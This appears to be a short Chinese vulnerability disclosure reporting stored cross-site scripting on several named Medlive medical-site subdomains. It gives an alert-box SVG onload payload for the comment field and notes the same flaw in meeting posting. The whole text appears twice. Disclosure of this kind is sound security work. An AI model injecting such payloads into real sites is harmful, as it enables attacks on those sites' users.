存储型XSS
医脉通多站点存在XSS漏洞
1、http://ecases.medlive.cn/
在发布评论处插入"/><svg οnlοad=alert(/1/)>
2、http://co-diovan.medlive.cn/
3.http://pua.medlive.cn/
4.http://meetings.medlive.cn/ 这个是在发布会议处存在。
医脉通多站点存在XSS漏洞
1、http://ecases.medlive.cn/
在发布评论处插入"/><svg οnlοad=alert(/1/)>
2、http://co-diovan.medlive.cn/
3.http://pua.medlive.cn/
4.http://meetings.medlive.cn/ 这个是在发布会议处存在。